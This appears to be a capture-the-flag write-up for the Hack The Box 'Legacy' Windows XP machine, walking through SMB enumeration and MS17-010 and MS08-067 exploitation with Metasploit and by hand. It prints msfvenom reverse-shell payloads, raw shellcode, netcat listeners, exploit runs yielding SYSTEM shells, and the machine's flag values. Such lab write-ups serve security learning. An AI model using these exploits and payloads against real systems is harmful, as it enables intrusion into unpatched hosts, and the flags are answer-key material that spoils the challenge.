Metadata
Difficulty: Easy
OS: Windows
Release Date: 15 Mar, 2017
Enumeration
Nmap
We start by running nmap
to discover the open ports on the machine.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 13:33 EST
Nmap scan report for 10.129.227.181
Host is up (0.11s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:2e:83 (VMware)
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2024-02-19T22:31:36+02:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds
From the Nmap scan, we discovered that SMB is running on the Windows XP operating system. As this is an old operating system, the chances of it being vulnerable are high.
Before we start looking for the vulnerability, it is always worth starting another nmap
scan to look for open UDP ports in the background (just to save some time in case we are following any rabbit holes). The following command can be used to look for UDP open ports:
nmap -sU -p- --min-rate 10000 -oA nmap/udpscan 10.129.227.181
Port 139,445/TCP - SMB
Running smbmap
to see what we can access without credentials.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ smbmap -H 10.129.227.181
...
------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
...
Access was denied. We can also confirm similar behavior with smbclient
as well.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ smbclient -N -L //10.129.227.181
session setup failed: NT_STATUS_INVALID_PARAMETER
Nmap Scripting Engine (NSE) scripts can be used to look for vulnerabilities on the server. The following command can be utilized to look for SMB vulnerabilities on port 445:
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ sudo nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 14:10 EST
Nmap scan report for 10.129.227.181
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds
From the scan result, we can see that this machine is vulnerable to two famous SMB exploits: ms17-010, and MS08-067.
Running searchsploit
against both exploits:
searchsploit ms17-010
searchsploit ms08-067
From the results, the highlighted exploits look promising.
Exploitation
ms17-010
Running discovered Metasploit exploit with setting necessary options. It opened up Administrative meterpreter shell on vulnerable machine.
msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.104:4444
[*] 10.129.227.181:445 - Target OS: Windows 5.1
[*] 10.129.227.181:445 - Filling barrel with fish... done
[*] 10.129.227.181:445 - <------------- | Entering Danger Zone | ------------->
[*] 10.129.227.181:445 - [*] Preparing dynamite...
[*] 10.129.227.181:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.129.227.181:445 - [+] Successfully Leaked Transaction!
[*] 10.129.227.181:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.129.227.181:445 - <------------- | Leaving Danger Zone | ------------->
[*] 10.129.227.181:445 - Reading from CONNECTION struct at: 0x86460660
[*] 10.129.227.181:445 - Built a write-what-where primitive...
[+] 10.129.227.181:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.227.181:445 - Selecting native target
[*] 10.129.227.181:445 - Uploading payload... slaLJsVT.exe
[*] 10.129.227.181:445 - Created \slaLJsVT.exe...
[+] 10.129.227.181:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] 10.129.227.181:445 - Deleting \slaLJsVT.exe...
[*] Meterpreter session 1 opened (10.10.14.104:4444 -> 10.129.227.181:1055) at 2024-02-14 16:30:31 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Manual Exploitation (Without Metasploit)
You will find many public repos for MS17-010 out there. But only a few exploits work against the Windows XP operating system. We will be using the send_and_execute.py
exploit from helviojunior's MS17-010 repo.
We will use msfvenom
to generate payload using the following command:
┌──(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.104 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o legacy_exploit.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: legacy_exploit.exe
We will set up a listener to receive a connection on port 443 using netcat.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...
Running send_and_execute.py
exploit against the machine.
┌──(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ python2 send_and_execute.py 10.129.227.181 legacy_exploit.exe
Traceback (most recent call last):
File "send_and_execute.py", line 2, in <module>
from impacket import smb, smbconnection
ImportError: No module named impacket
We have one more hurdle to cross at this point. The latest version of Kali comes with impacket for python3. For our script to run we would need impacket for python2. The simple solution is to use virtualenv
.
Troubleshooting
- Install virtualenv for python2
pip2 install virtualenv
- Now create a separate environment for impacket
/home/kali/.local/bin/virtualenv --python=/usr/bin/python2 impacket-venv
- To activate the new virtual environment, run the following:
source impacket-venv/bin/activate
- Installing an older version of impacket to avoid issues with dsinternals
pip install impacket==0.9.22
After running the troubleshooting steps, our exploit should run smoothly. Running send_and_execute.py
exploit once again.
┌──(impacket-venv)─(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ python2 send_and_execute.py 10.129.227.181 legacy_exploit.exe
Trying to connect to 10.129.227.181:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x860b5da8
SESSION: 0xe116a9d0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe121ab50
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe121abf0
overwriting token UserAndGroups
Sending file HINCZ4.exe...
Opening SVCManager on 10.129.227.181.....
Creating service RNxd.....
Starting service RNxd.....
The NETBIOS connection with the remote host timed out.
Removing service RNxd.....
ServiceExec Error on: 10.129.227.181
nca_s_proto_error
Done
Payload successfully executed on the machine and connection was received by the netcat listener.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.227.181] 1073
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
ms08-067
Running discovered Metasploit exploit with setting necessary options. It opened up the Administrative meterpreter shell.
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.104:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.14.104:4444 -> 10.129.227.181:1056) at 2024-02-14 16:40:11 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Manual Exploitation (Without Metasploit)
For this purpose, we will be using ms08-067.py
exploit from jivoi's pentest repo.
The script includes steps to generate shellcode using msfvenom
. We can use the following command:
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.104 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes
unsigned char buf[] =
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x32\x82\x69\xc2\x83\xee\xfc\xe2\xf4\xce\x6a\xeb\xc2"
"\x32\x82\x09\x4b\xd7\xb3\xa9\xa6\xb9\xd2\x59\x49\x60\x8e"
"\xe2\x90\x26\x09\x1b\xea\x3d\x35\x23\xe4\x03\x7d\xc5\xfe"
"\x53\xfe\x6b\xee\x12\x43\xa6\xcf\x33\x45\x8b\x30\x60\xd5"
"\xe2\x90\x22\x09\x23\xfe\xb9\xce\x78\xba\xd1\xca\x68\x13"
"\x63\x09\x30\xe2\x33\x51\xe2\x8b\x2a\x61\x53\x8b\xb9\xb6"
"\xe2\xc3\xe4\xb3\x96\x6e\xf3\x4d\x64\xc3\xf5\xba\x89\xb7"
"\xc4\x81\x14\x3a\x09\xff\x4d\xb7\xd6\xda\xe2\x9a\x16\x83"
"\xba\xa4\xb9\x8e\x22\x49\x6a\x9e\x68\x11\xb9\x86\xe2\xc3"
"\xe2\x0b\x2d\xe6\x16\xd9\x32\xa3\x6b\xd8\x38\x3d\xd2\xdd"
"\x36\x98\xb9\x90\x82\x4f\x6f\xea\x5a\xf0\x32\x82\x01\xb5"
"\x41\xb0\x36\x96\x5a\xce\x1e\xe4\x35\x7d\xbc\x7a\xa2\x83"
"\x69\xc2\x1b\x46\x3d\x92\x5a\xab\xe9\xa9\x32\x7d\xbc\x92"
"\x62\xd2\x39\x82\x62\xc2\x39\xaa\xd8\x8d\xb6\x22\xcd\x57"
"\xfe\xa8\x37\xea\x63\xc8\x3c\xea\x01\xc0\x32\x83\xd2\x4b"
"\xd4\xe8\x79\x94\x65\xea\xf0\x67\x46\xe3\x96\x17\xb7\x42"
"\x1d\xce\xcd\xcc\x61\xb7\xde\xea\x99\x77\x90\xd4\x96\x17"
"\x5a\xe1\x04\xa6\x32\x0b\x8a\x95\x65\xd5\x58\x34\x58\x90"
"\x30\x94\xd0\x7f\x0f\x05\x76\xa6\x55\xc3\x33\x0f\x2d\xe6"
"\x22\x44\x69\x86\x66\xd2\x3f\x94\x64\xc4\x3f\x8c\x64\xd4"
"\x3a\x94\x5a\xfb\xa5\xfd\xb4\x7d\xbc\x4b\xd2\xcc\x3f\x84"
"\xcd\xb2\x01\xca\xb5\x9f\x09\x3d\xe7\x39\x89\xdf\x18\x88"
"\x01\x64\xa7\x3f\xf4\x3d\xe7\xbe\x6f\xbe\x38\x02\x92\x22"
"\x47\x87\xd2\x85\x21\xf0\x06\xa8\x32\xd1\x96\x17";
Replace generated shellcode in python exploit.
At this point start a listener to receive a connection on port 443 using netcat.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...
Running ms08-067.py
exploit against the machine.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py
Install the following library to make this script work
Impacket : https://github.com/CoreSecurity/impacket.git
PyCrypto : https://pypi.python.org/pypi/pycrypto
Looks like a similar issue we encountered during the manual exploitation of the MS17-010 exploit. Following similar steps with virtualenv
, and running the Python script:
┌──(impacket-venv)─(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################
$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .
#######################################################################
Usage: ms08-067.py <target ip> <os #> <Port #>
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
FYI: nmap has a good OS discovery script that pairs well with this exploit:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1
The exploit requires us to know the version of the Windows and language pack. From the initial enumeration, we know the version is Windows XP. From examples, target 6 (Windows XP SP3 English (NX)) looks promising.
Running ms08-067.py
exploit once again with necessary arguments:
┌──(impacket-venv)─(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py 10.129.227.181 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################
$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.129.227.181[\pipe\browser]
Exploit finish
Payload successfully executed on the machine and connection was received by the netcat listener.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.227.181] 1076
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>
whoami
Our machine doesn't seem to have a whoami
binary or command. Several useful Windows binaries are available by default on Kali OS.
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ locate whoami.exe
/usr/share/windows-resources/binaries/whoami.exe
The following command can be used to share the binaries folder over SMB:
┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ impacket-smbserver webhackery /usr/share/windows-resources/binaries/
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Running whoami.exe
against the machine to confirm Administrative access.
C:\WINDOWS\system32>\\10.10.14.104\webhackery\whoami.exe
\\10.10.14.104\webhackery\whoami.exe
NT AUTHORITY\SYSTEM
Proof
user.txt
C:\Documents and Settings\john\Desktop>dir && hostname && type user.txt && ipconfig
dir && hostname && type user.txt && ipconfig
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 08:19 <DIR> .
16/03/2017 08:19 <DIR> ..
16/03/2017 08:19 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.400.086.016 bytes free
legacy
e69af0e4f443de7e36876fda4ec7644f
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
IP Address. . . . . . . . . . . . : 10.129.227.181
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
C:\Documents and Settings\john\Desktop>
root.txt
C:\Documents and Settings\Administrator\Desktop>dir && hostname && type root.txt && ipconfig
dir && hostname && type root.txt && ipconfig
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 08:18 <DIR> .
16/03/2017 08:18 <DIR> ..
16/03/2017 08:18 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.400.073.728 bytes free
legacy
993442d258b0e0ec917cae9e695d5713
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
IP Address. . . . . . . . . . . . : 10.129.227.181
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
C:\Documents and Settings\Administrator\Desktop>